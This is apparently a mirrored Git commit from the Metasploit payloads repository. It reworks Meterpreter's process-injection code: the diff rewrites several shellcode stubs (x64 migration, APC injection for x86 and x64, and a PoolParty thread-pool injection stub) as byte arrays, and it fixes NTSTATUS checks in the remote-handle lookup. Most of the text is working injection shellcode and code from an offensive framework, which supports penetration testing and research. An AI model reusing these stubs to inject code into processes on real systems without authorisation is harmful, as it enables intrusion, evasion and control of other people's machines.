mirror of
https://github.com/rapid7/metasploit-payloads
synced 2025-03-24 18:16:24 +01:00
fix(injection): review changes
This commit is contained in:
dledda-r7
parent
ff182d10c4
commit
a7485082ca
c/meterpreter/source/metsrv
@ -1,4 +1,3 @@
|
||||
#pragma once
|
||||
#include "metsrv.h"
|
||||
#include "base_inject.h"
|
||||
#include "remote_thread.h"
|
||||
@ -9,94 +8,94 @@
|
||||
// see '/msf3/external/source/shellcode/x86/migrate/executex64.asm'
|
||||
// 03.06.2017: fixed an elusive bug on AMD CPUs, http://blog.rewolf.pl/blog/?p=1484
|
||||
// found and fixed by ReWolf, incorporated by RaMMicHaeL
|
||||
BYTE migrate_executex64[] = "\x55\x89\xE5\x56\x57\x8B\x75\x08\x8B\x4D\x0C\xE8\x00\x00\x00\x00"
|
||||
"\x58\x83\xC0\x2B\x83\xEC\x08\x89\xE2\xC7\x42\x04\x33\x00\x00\x00"
|
||||
"\x89\x02\xE8\x0F\x00\x00\x00\x66\x8C\xD8\x66\x8E\xD0\x83\xC4\x14"
|
||||
"\x5F\x5E\x5D\xC2\x08\x00\x8B\x3C\xE4\xFF\x2A\x48\x31\xC0\x57\xFF"
|
||||
"\xD6\x5F\x50\xC7\x44\x24\x04\x23\x00\x00\x00\x89\x3C\x24\xFF\x2C"
|
||||
"\x24";
|
||||
BYTE migrate_executex64[] = {0x55,0x89,0xE5,0x56,0x57,0x8B,0x75,0x08,0x8B,0x4D,0x0C,0xE8,0x00,0x00,0x00,0x00
|
||||
,0x58,0x83,0xC0,0x2B,0x83,0xEC,0x08,0x89,0xE2,0xC7,0x42,0x04,0x33,0x00,0x00,0x00
|
||||
,0x89,0x02,0xE8,0x0F,0x00,0x00,0x00,0x66,0x8C,0xD8,0x66,0x8E,0xD0,0x83,0xC4,0x14
|
||||
,0x5F,0x5E,0x5D,0xC2,0x08,0x00,0x8B,0x3C,0xE4,0xFF,0x2A,0x48,0x31,0xC0,0x57,0xFF
|
||||
,0xD6,0x5F,0x50,0xC7,0x44,0x24,0x04,0x23,0x00,0x00,0x00,0x89,0x3C,0x24,0xFF,0x2C
|
||||
,0x24};
|
||||
|
||||
// see '/msf3/external/source/shellcode/x64/migrate/remotethread.asm'
|
||||
BYTE migrate_wownativex[] = "\xFC\x48\x89\xCE\x48\x89\xE7\x48\x83\xE4\xF0\xE8\xC8\x00\x00\x00"
|
||||
"\x41\x51\x41\x50\x52\x51\x56\x48\x31\xD2\x65\x48\x8B\x52\x60\x48"
|
||||
"\x8B\x52\x18\x48\x8B\x52\x20\x48\x8B\x72\x50\x48\x0F\xB7\x4A\x4A"
|
||||
"\x4D\x31\xC9\x48\x31\xC0\xAC\x3C\x61\x7C\x02\x2C\x20\x41\xC1\xC9"
|
||||
"\x0D\x41\x01\xC1\xE2\xED\x52\x41\x51\x48\x8B\x52\x20\x8B\x42\x3C"
|
||||
"\x48\x01\xD0\x66\x81\x78\x18\x0B\x02\x75\x72\x8B\x80\x88\x00\x00"
|
||||
"\x00\x48\x85\xC0\x74\x67\x48\x01\xD0\x50\x8B\x48\x18\x44\x8B\x40"
|
||||
"\x20\x49\x01\xD0\xE3\x56\x48\xFF\xC9\x41\x8B\x34\x88\x48\x01\xD6"
|
||||
"\x4D\x31\xC9\x48\x31\xC0\xAC\x41\xC1\xC9\x0D\x41\x01\xC1\x38\xE0"
|
||||
"\x75\xF1\x4C\x03\x4C\x24\x08\x45\x39\xD1\x75\xD8\x58\x44\x8B\x40"
|
||||
"\x24\x49\x01\xD0\x66\x41\x8B\x0C\x48\x44\x8B\x40\x1C\x49\x01\xD0"
|
||||
"\x41\x8B\x04\x88\x48\x01\xD0\x41\x58\x41\x58\x5E\x59\x5A\x41\x58"
|
||||
"\x41\x59\x41\x5A\x48\x83\xEC\x20\x41\x52\xFF\xE0\x58\x41\x59\x5A"
|
||||
"\x48\x8B\x12\xE9\x4F\xFF\xFF\xFF\x5D\x4D\x31\xC9\x41\x51\x48\x8D"
|
||||
"\x46\x18\x50\xFF\x76\x10\xFF\x76\x08\x41\x51\x41\x51\x49\xB8\x01"
|
||||
"\x00\x00\x00\x00\x00\x00\x00\x48\x31\xD2\x48\x8B\x0E\x41\xBA\xC8"
|
||||
"\x38\xA4\x40\xFF\xD5\x48\x85\xC0\x74\x0C\x48\xB8\x00\x00\x00\x00"
|
||||
"\x00\x00\x00\x00\xEB\x0A\x48\xB8\x01\x00\x00\x00\x00\x00\x00\x00"
|
||||
"\x48\x83\xC4\x50\x48\x89\xFC\xC3";
|
||||
BYTE migrate_wownativex[] = {0xFC,0x48,0x89,0xCE,0x48,0x89,0xE7,0x48,0x83,0xE4,0xF0,0xE8,0xC8,0x00,0x00,0x00
|
||||
,0x41,0x51,0x41,0x50,0x52,0x51,0x56,0x48,0x31,0xD2,0x65,0x48,0x8B,0x52,0x60,0x48
|
||||
,0x8B,0x52,0x18,0x48,0x8B,0x52,0x20,0x48,0x8B,0x72,0x50,0x48,0x0F,0xB7,0x4A,0x4A
|
||||
,0x4D,0x31,0xC9,0x48,0x31,0xC0,0xAC,0x3C,0x61,0x7C,0x02,0x2C,0x20,0x41,0xC1,0xC9
|
||||
,0x0D,0x41,0x01,0xC1,0xE2,0xED,0x52,0x41,0x51,0x48,0x8B,0x52,0x20,0x8B,0x42,0x3C
|
||||
,0x48,0x01,0xD0,0x66,0x81,0x78,0x18,0x0B,0x02,0x75,0x72,0x8B,0x80,0x88,0x00,0x00
|
||||
,0x00,0x48,0x85,0xC0,0x74,0x67,0x48,0x01,0xD0,0x50,0x8B,0x48,0x18,0x44,0x8B,0x40
|
||||
,0x20,0x49,0x01,0xD0,0xE3,0x56,0x48,0xFF,0xC9,0x41,0x8B,0x34,0x88,0x48,0x01,0xD6
|
||||
,0x4D,0x31,0xC9,0x48,0x31,0xC0,0xAC,0x41,0xC1,0xC9,0x0D,0x41,0x01,0xC1,0x38,0xE0
|
||||
,0x75,0xF1,0x4C,0x03,0x4C,0x24,0x08,0x45,0x39,0xD1,0x75,0xD8,0x58,0x44,0x8B,0x40
|
||||
,0x24,0x49,0x01,0xD0,0x66,0x41,0x8B,0x0C,0x48,0x44,0x8B,0x40,0x1C,0x49,0x01,0xD0
|
||||
,0x41,0x8B,0x04,0x88,0x48,0x01,0xD0,0x41,0x58,0x41,0x58,0x5E,0x59,0x5A,0x41,0x58
|
||||
,0x41,0x59,0x41,0x5A,0x48,0x83,0xEC,0x20,0x41,0x52,0xFF,0xE0,0x58,0x41,0x59,0x5A
|
||||
,0x48,0x8B,0x12,0xE9,0x4F,0xFF,0xFF,0xFF,0x5D,0x4D,0x31,0xC9,0x41,0x51,0x48,0x8D
|
||||
,0x46,0x18,0x50,0xFF,0x76,0x10,0xFF,0x76,0x08,0x41,0x51,0x41,0x51,0x49,0xB8,0x01
|
||||
,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x48,0x31,0xD2,0x48,0x8B,0x0E,0x41,0xBA,0xC8
|
||||
,0x38,0xA4,0x40,0xFF,0xD5,0x48,0x85,0xC0,0x74,0x0C,0x48,0xB8,0x00,0x00,0x00,0x00
|
||||
,0x00,0x00,0x00,0x00,0xEB,0x0A,0x48,0xB8,0x01,0x00,0x00,0x00,0x00,0x00,0x00,0x00
|
||||
,0x48,0x83,0xC4,0x50,0x48,0x89,0xFC,0xC3};
|
||||
|
||||
// see '/msf3/external/source/shellcode/x86/migrate/apc.asm'
|
||||
BYTE apc_stub_x86[] = "\xFC\x8B\x74\x24\x04\x55\x89\xE5\xE8\x89\x00\x00\x00\x60\x89\xE5"
|
||||
"\x31\xD2\x64\x8B\x52\x30\x8B\x52\x0C\x8B\x52\x14\x8B\x72\x28\x0F"
|
||||
"\xB7\x4A\x26\x31\xFF\x31\xC0\xAC\x3C\x61\x7C\x02\x2C\x20\xC1\xCF"
|
||||
"\x0D\x01\xC7\xE2\xF0\x52\x57\x8B\x52\x10\x8B\x42\x3C\x01\xD0\x8B"
|
||||
"\x40\x78\x85\xC0\x74\x4A\x01\xD0\x50\x8B\x48\x18\x8B\x58\x20\x01"
|
||||
"\xD3\xE3\x3C\x49\x8B\x34\x8B\x01\xD6\x31\xFF\x31\xC0\xAC\xC1\xCF"
|
||||
"\x0D\x01\xC7\x38\xE0\x75\xF4\x03\x7D\xF8\x3B\x7D\x24\x75\xE2\x58"
|
||||
"\x8B\x58\x24\x01\xD3\x66\x8B\x0C\x4B\x8B\x58\x1C\x01\xD3\x8B\x04"
|
||||
"\x8B\x01\xD0\x89\x44\x24\x24\x5B\x5B\x61\x59\x5A\x51\xFF\xE0\x58"
|
||||
"\x5F\x5A\x8B\x12\xEB\x86\x5B\x80\x7E\x10\x00\x75\x3B\xC6\x46\x10"
|
||||
"\x01\x68\xA6\x95\xBD\x9D\xFF\xD3\x3C\x06\x7C\x1A\x31\xC9\x64\x8B"
|
||||
"\x41\x18\x39\x88\xA8\x01\x00\x00\x75\x0C\x8D\x93\xCF\x00\x00\x00"
|
||||
"\x89\x90\xA8\x01\x00\x00\x31\xC9\x51\x51\xFF\x76\x08\xFF\x36\x51"
|
||||
"\x51\x68\x38\x68\x0D\x16\xFF\xD3\xC9\xC2\x0C\x00\x00\x00\x00\x00"
|
||||
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
|
||||
"\x00\x00\x00\x00";
|
||||
BYTE apc_stub_x86[] = {0xFC,0x8B,0x74,0x24,0x04,0x55,0x89,0xE5,0xE8,0x89,0x00,0x00,0x00,0x60,0x89,0xE5
|
||||
,0x31,0xD2,0x64,0x8B,0x52,0x30,0x8B,0x52,0x0C,0x8B,0x52,0x14,0x8B,0x72,0x28,0x0F
|
||||
,0xB7,0x4A,0x26,0x31,0xFF,0x31,0xC0,0xAC,0x3C,0x61,0x7C,0x02,0x2C,0x20,0xC1,0xCF
|
||||
,0x0D,0x01,0xC7,0xE2,0xF0,0x52,0x57,0x8B,0x52,0x10,0x8B,0x42,0x3C,0x01,0xD0,0x8B
|
||||
,0x40,0x78,0x85,0xC0,0x74,0x4A,0x01,0xD0,0x50,0x8B,0x48,0x18,0x8B,0x58,0x20,0x01
|
||||
,0xD3,0xE3,0x3C,0x49,0x8B,0x34,0x8B,0x01,0xD6,0x31,0xFF,0x31,0xC0,0xAC,0xC1,0xCF
|
||||
,0x0D,0x01,0xC7,0x38,0xE0,0x75,0xF4,0x03,0x7D,0xF8,0x3B,0x7D,0x24,0x75,0xE2,0x58
|
||||
,0x8B,0x58,0x24,0x01,0xD3,0x66,0x8B,0x0C,0x4B,0x8B,0x58,0x1C,0x01,0xD3,0x8B,0x04
|
||||
,0x8B,0x01,0xD0,0x89,0x44,0x24,0x24,0x5B,0x5B,0x61,0x59,0x5A,0x51,0xFF,0xE0,0x58
|
||||
,0x5F,0x5A,0x8B,0x12,0xEB,0x86,0x5B,0x80,0x7E,0x10,0x00,0x75,0x3B,0xC6,0x46,0x10
|
||||
,0x01,0x68,0xA6,0x95,0xBD,0x9D,0xFF,0xD3,0x3C,0x06,0x7C,0x1A,0x31,0xC9,0x64,0x8B
|
||||
,0x41,0x18,0x39,0x88,0xA8,0x01,0x00,0x00,0x75,0x0C,0x8D,0x93,0xCF,0x00,0x00,0x00
|
||||
,0x89,0x90,0xA8,0x01,0x00,0x00,0x31,0xC9,0x51,0x51,0xFF,0x76,0x08,0xFF,0x36,0x51
|
||||
,0x51,0x68,0x38,0x68,0x0D,0x16,0xFF,0xD3,0xC9,0xC2,0x0C,0x00,0x00,0x00,0x00,0x00
|
||||
,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00
|
||||
,0x00,0x00,0x00,0x00};
|
||||
|
||||
// see '/msf3/external/source/shellcode/x64/migrate/apc.asm'
|
||||
BYTE apc_stub_x64[] = "\xFC\x80\x79\x10\x00\x0F\x85\x13\x01\x00\x00\xC6\x41\x10\x01\x48"
|
||||
"\x83\xEC\x78\xE8\xC8\x00\x00\x00\x41\x51\x41\x50\x52\x51\x56\x48"
|
||||
"\x31\xD2\x65\x48\x8B\x52\x60\x48\x8B\x52\x18\x48\x8B\x52\x20\x48"
|
||||
"\x8B\x72\x50\x48\x0F\xB7\x4A\x4A\x4D\x31\xC9\x48\x31\xC0\xAC\x3C"
|
||||
"\x61\x7C\x02\x2C\x20\x41\xC1\xC9\x0D\x41\x01\xC1\xE2\xED\x52\x41"
|
||||
"\x51\x48\x8B\x52\x20\x8B\x42\x3C\x48\x01\xD0\x66\x81\x78\x18\x0B"
|
||||
"\x02\x75\x72\x8B\x80\x88\x00\x00\x00\x48\x85\xC0\x74\x67\x48\x01"
|
||||
"\xD0\x50\x8B\x48\x18\x44\x8B\x40\x20\x49\x01\xD0\xE3\x56\x48\xFF"
|
||||
"\xC9\x41\x8B\x34\x88\x48\x01\xD6\x4D\x31\xC9\x48\x31\xC0\xAC\x41"
|
||||
"\xC1\xC9\x0D\x41\x01\xC1\x38\xE0\x75\xF1\x4C\x03\x4C\x24\x08\x45"
|
||||
"\x39\xD1\x75\xD8\x58\x44\x8B\x40\x24\x49\x01\xD0\x66\x41\x8B\x0C"
|
||||
"\x48\x44\x8B\x40\x1C\x49\x01\xD0\x41\x8B\x04\x88\x48\x01\xD0\x41"
|
||||
"\x58\x41\x58\x5E\x59\x5A\x41\x58\x41\x59\x41\x5A\x48\x83\xEC\x20"
|
||||
"\x41\x52\xFF\xE0\x58\x41\x59\x5A\x48\x8B\x12\xE9\x4F\xFF\xFF\xFF"
|
||||
"\x5D\x48\x31\xD2\x65\x48\x8B\x42\x30\x48\x39\x90\xC8\x02\x00\x00"
|
||||
"\x75\x0E\x48\x8D\x95\x07\x01\x00\x00\x48\x89\x90\xC8\x02\x00\x00"
|
||||
"\x4C\x8B\x01\x4C\x8B\x49\x08\x48\x31\xC9\x48\x31\xD2\x51\x51\x41"
|
||||
"\xBA\x38\x68\x0D\x16\xFF\xD5\x48\x81\xC4\xA8\x00\x00\x00\xC3\x00"
|
||||
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
|
||||
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
|
||||
"\x00\x00\x00";
|
||||
BYTE apc_stub_x64[] = {0xFC,0x80,0x79,0x10,0x00,0x0F,0x85,0x13,0x01,0x00,0x00,0xC6,0x41,0x10,0x01,0x48
|
||||
,0x83,0xEC,0x78,0xE8,0xC8,0x00,0x00,0x00,0x41,0x51,0x41,0x50,0x52,0x51,0x56,0x48
|
||||
,0x31,0xD2,0x65,0x48,0x8B,0x52,0x60,0x48,0x8B,0x52,0x18,0x48,0x8B,0x52,0x20,0x48
|
||||
,0x8B,0x72,0x50,0x48,0x0F,0xB7,0x4A,0x4A,0x4D,0x31,0xC9,0x48,0x31,0xC0,0xAC,0x3C
|
||||
,0x61,0x7C,0x02,0x2C,0x20,0x41,0xC1,0xC9,0x0D,0x41,0x01,0xC1,0xE2,0xED,0x52,0x41
|
||||
,0x51,0x48,0x8B,0x52,0x20,0x8B,0x42,0x3C,0x48,0x01,0xD0,0x66,0x81,0x78,0x18,0x0B
|
||||
,0x02,0x75,0x72,0x8B,0x80,0x88,0x00,0x00,0x00,0x48,0x85,0xC0,0x74,0x67,0x48,0x01
|
||||
,0xD0,0x50,0x8B,0x48,0x18,0x44,0x8B,0x40,0x20,0x49,0x01,0xD0,0xE3,0x56,0x48,0xFF
|
||||
,0xC9,0x41,0x8B,0x34,0x88,0x48,0x01,0xD6,0x4D,0x31,0xC9,0x48,0x31,0xC0,0xAC,0x41
|
||||
,0xC1,0xC9,0x0D,0x41,0x01,0xC1,0x38,0xE0,0x75,0xF1,0x4C,0x03,0x4C,0x24,0x08,0x45
|
||||
,0x39,0xD1,0x75,0xD8,0x58,0x44,0x8B,0x40,0x24,0x49,0x01,0xD0,0x66,0x41,0x8B,0x0C
|
||||
,0x48,0x44,0x8B,0x40,0x1C,0x49,0x01,0xD0,0x41,0x8B,0x04,0x88,0x48,0x01,0xD0,0x41
|
||||
,0x58,0x41,0x58,0x5E,0x59,0x5A,0x41,0x58,0x41,0x59,0x41,0x5A,0x48,0x83,0xEC,0x20
|
||||
,0x41,0x52,0xFF,0xE0,0x58,0x41,0x59,0x5A,0x48,0x8B,0x12,0xE9,0x4F,0xFF,0xFF,0xFF
|
||||
,0x5D,0x48,0x31,0xD2,0x65,0x48,0x8B,0x42,0x30,0x48,0x39,0x90,0xC8,0x02,0x00,0x00
|
||||
,0x75,0x0E,0x48,0x8D,0x95,0x07,0x01,0x00,0x00,0x48,0x89,0x90,0xC8,0x02,0x00,0x00
|
||||
,0x4C,0x8B,0x01,0x4C,0x8B,0x49,0x08,0x48,0x31,0xC9,0x48,0x31,0xD2,0x51,0x51,0x41
|
||||
,0xBA,0x38,0x68,0x0D,0x16,0xFF,0xD5,0x48,0x81,0xC4,0xA8,0x00,0x00,0x00,0xC3,0x00
|
||||
,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00
|
||||
,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00
|
||||
,0x00,0x00,0x00};
|
||||
|
||||
// see '/msf3/external/source/shellcode/x64/migrate/poolparty.asm'
|
||||
BYTE poolparty_stub_x64[] = "\xFC\x55\x57\x56\x48\x89\xE7\xE9\x01\x01\x00\x00\x5E\x48\x83\xEC"
|
||||
"\x78\xE8\xC8\x00\x00\x00\x41\x51\x41\x50\x52\x51\x56\x48\x31\xD2"
|
||||
"\x65\x48\x8B\x52\x60\x48\x8B\x52\x18\x48\x8B\x52\x20\x48\x8B\x72"
|
||||
"\x50\x48\x0F\xB7\x4A\x4A\x4D\x31\xC9\x48\x31\xC0\xAC\x3C\x61\x7C"
|
||||
"\x02\x2C\x20\x41\xC1\xC9\x0D\x41\x01\xC1\xE2\xED\x52\x41\x51\x48"
|
||||
"\x8B\x52\x20\x8B\x42\x3C\x48\x01\xD0\x66\x81\x78\x18\x0B\x02\x75"
|
||||
"\x72\x8B\x80\x88\x00\x00\x00\x48\x85\xC0\x74\x67\x48\x01\xD0\x50"
|
||||
"\x8B\x48\x18\x44\x8B\x40\x20\x49\x01\xD0\xE3\x56\x48\xFF\xC9\x41"
|
||||
"\x8B\x34\x88\x48\x01\xD6\x4D\x31\xC9\x48\x31\xC0\xAC\x41\xC1\xC9"
|
||||
"\x0D\x41\x01\xC1\x38\xE0\x75\xF1\x4C\x03\x4C\x24\x08\x45\x39\xD1"
|
||||
"\x75\xD8\x58\x44\x8B\x40\x24\x49\x01\xD0\x66\x41\x8B\x0C\x48\x44"
|
||||
"\x8B\x40\x1C\x49\x01\xD0\x41\x8B\x04\x88\x48\x01\xD0\x41\x58\x41"
|
||||
"\x58\x5E\x59\x5A\x41\x58\x41\x59\x41\x5A\x48\x83\xEC\x20\x41\x52"
|
||||
"\xFF\xE0\x58\x41\x59\x5A\x48\x8B\x12\xE9\x4F\xFF\xFF\xFF\x5D\x8B"
|
||||
"\x4E\x10\x48\x31\xD2\xFF\xCA\x41\xBA\x08\x87\x1D\x60\xFF\xD5\x48"
|
||||
"\x31\xD2\x4C\x8B\x06\x4C\x8B\x4E\x08\x48\x31\xC9\x51\x51\x41\xBA"
|
||||
"\x38\x68\x0D\x16\xFF\xD5\x48\x89\xFC\x5E\x5F\x5D\xC3\xE8\xFA\xFE"
|
||||
"\xFF\xFF";
|
||||
BYTE poolparty_stub_x64[] = {0xFC,0x55,0x57,0x56,0x48,0x89,0xE7,0xE9,0x01,0x01,0x00,0x00,0x5E,0x48,0x83,0xEC
|
||||
,0x78,0xE8,0xC8,0x00,0x00,0x00,0x41,0x51,0x41,0x50,0x52,0x51,0x56,0x48,0x31,0xD2
|
||||
,0x65,0x48,0x8B,0x52,0x60,0x48,0x8B,0x52,0x18,0x48,0x8B,0x52,0x20,0x48,0x8B,0x72
|
||||
,0x50,0x48,0x0F,0xB7,0x4A,0x4A,0x4D,0x31,0xC9,0x48,0x31,0xC0,0xAC,0x3C,0x61,0x7C
|
||||
,0x02,0x2C,0x20,0x41,0xC1,0xC9,0x0D,0x41,0x01,0xC1,0xE2,0xED,0x52,0x41,0x51,0x48
|
||||
,0x8B,0x52,0x20,0x8B,0x42,0x3C,0x48,0x01,0xD0,0x66,0x81,0x78,0x18,0x0B,0x02,0x75
|
||||
,0x72,0x8B,0x80,0x88,0x00,0x00,0x00,0x48,0x85,0xC0,0x74,0x67,0x48,0x01,0xD0,0x50
|
||||
,0x8B,0x48,0x18,0x44,0x8B,0x40,0x20,0x49,0x01,0xD0,0xE3,0x56,0x48,0xFF,0xC9,0x41
|
||||
,0x8B,0x34,0x88,0x48,0x01,0xD6,0x4D,0x31,0xC9,0x48,0x31,0xC0,0xAC,0x41,0xC1,0xC9
|
||||
,0x0D,0x41,0x01,0xC1,0x38,0xE0,0x75,0xF1,0x4C,0x03,0x4C,0x24,0x08,0x45,0x39,0xD1
|
||||
,0x75,0xD8,0x58,0x44,0x8B,0x40,0x24,0x49,0x01,0xD0,0x66,0x41,0x8B,0x0C,0x48,0x44
|
||||
,0x8B,0x40,0x1C,0x49,0x01,0xD0,0x41,0x8B,0x04,0x88,0x48,0x01,0xD0,0x41,0x58,0x41
|
||||
,0x58,0x5E,0x59,0x5A,0x41,0x58,0x41,0x59,0x41,0x5A,0x48,0x83,0xEC,0x20,0x41,0x52
|
||||
,0xFF,0xE0,0x58,0x41,0x59,0x5A,0x48,0x8B,0x12,0xE9,0x4F,0xFF,0xFF,0xFF,0x5D,0x8B
|
||||
,0x4E,0x10,0x48,0x31,0xD2,0xFF,0xCA,0x41,0xBA,0x08,0x87,0x1D,0x60,0xFF,0xD5,0x48
|
||||
,0x31,0xD2,0x4C,0x8B,0x06,0x4C,0x8B,0x4E,0x08,0x48,0x31,0xC9,0x51,0x51,0x41,0xBA
|
||||
,0x38,0x68,0x0D,0x16,0xFF,0xD5,0x48,0x89,0xFC,0x5E,0x5F,0x5D,0xC3,0xE8,0xFA,0xFE
|
||||
,0xFF,0xFF};
|
||||
|
||||
/*
|
||||
* Attempt to gain code execution in the remote process via a call to ntdll!NtQueueApcThread
|
||||
@ -531,7 +530,7 @@ DWORD inject_via_poolparty(Remote* remote, Packet* response, HANDLE hProcess, DW
|
||||
if (dwDestinationArch == PROCESS_ARCH_X64 && (dwMeterpreterArch == PROCESS_ARCH_X86 || dwMeterpreterArch == PROCESS_ARCH_X86)) {
|
||||
dprintf("[INJECT][inject_via_poolparty] using: poolparty_stub_x64");
|
||||
lpStub = &poolparty_stub_x64;
|
||||
dwStubSize = sizeof(poolparty_stub_x64) - 1;
|
||||
dwStubSize = sizeof(poolparty_stub_x64);
|
||||
}
|
||||
else {
|
||||
BREAK_WITH_ERROR("[INJECT][inject_via_poolparty] Can't inject on this target (yet)!", ERROR_INVALID_FUNCTION);
|
||||
|
||||
@ -1,3 +1,4 @@
|
||||
#include <ntstatus.h>
|
||||
#include "common.h"
|
||||
#include "pool_party.h"
|
||||
#include "pool_party_ext.h"
|
||||
@ -156,10 +157,10 @@ HANDLE GetRemoteHandle(HANDLE hProcess, LPCWSTR typeName, DWORD dwDesiredAccess)
|
||||
return INVALID_HANDLE_VALUE;
|
||||
}
|
||||
dprintf("[INJECT][inject_via_poolparty][get_remote_handle] lpProcessInfo: %p", lpProcessInfo);
|
||||
while (ntStatus != ERROR_SUCCESS) {
|
||||
while (ntStatus != STATUS_SUCCESS) {
|
||||
ntStatus = pNtDll->pNtQueryInformationProcess(hProcess, ProcessHandleInformation, lpProcessInfo, dwInformationSizeIn, &dwInformationSizeOut);
|
||||
dprintf("[INJECT][inject_via_poolparty][get_remote_handle] NtQueryInformationProcess() : %p", ntStatus);
|
||||
if (ntStatus == 0xC0000004L && dwInformationSizeIn != dwInformationSizeOut) {
|
||||
if (ntStatus == STATUS_INFO_LENGTH_MISMATCH && dwInformationSizeIn != dwInformationSizeOut) {
|
||||
lpProcessInfo = HeapReAlloc(hHeap, 0, lpProcessInfo, dwInformationSizeOut);
|
||||
if(lpProcessInfo == NULL) {
|
||||
dprintf("[INJECT][inject_via_poolparty][get_remote_handle] HeapReAlloc() returned NULL");
|
||||
@ -169,7 +170,7 @@ HANDLE GetRemoteHandle(HANDLE hProcess, LPCWSTR typeName, DWORD dwDesiredAccess)
|
||||
dwInformationSizeIn = dwInformationSizeOut;
|
||||
continue;
|
||||
}
|
||||
if (ntStatus != ERROR_SUCCESS && ntStatus != 0xC0000004L) {
|
||||
if (ntStatus != STATUS_SUCCESS && ntStatus != STATUS_INFO_LENGTH_MISMATCH) {
|
||||
HeapFree(hHeap, 0, lpProcessInfo);
|
||||
return INVALID_HANDLE_VALUE;
|
||||
}
|
||||
|
||||
Loading…
x
Reference in New Issue
Block a user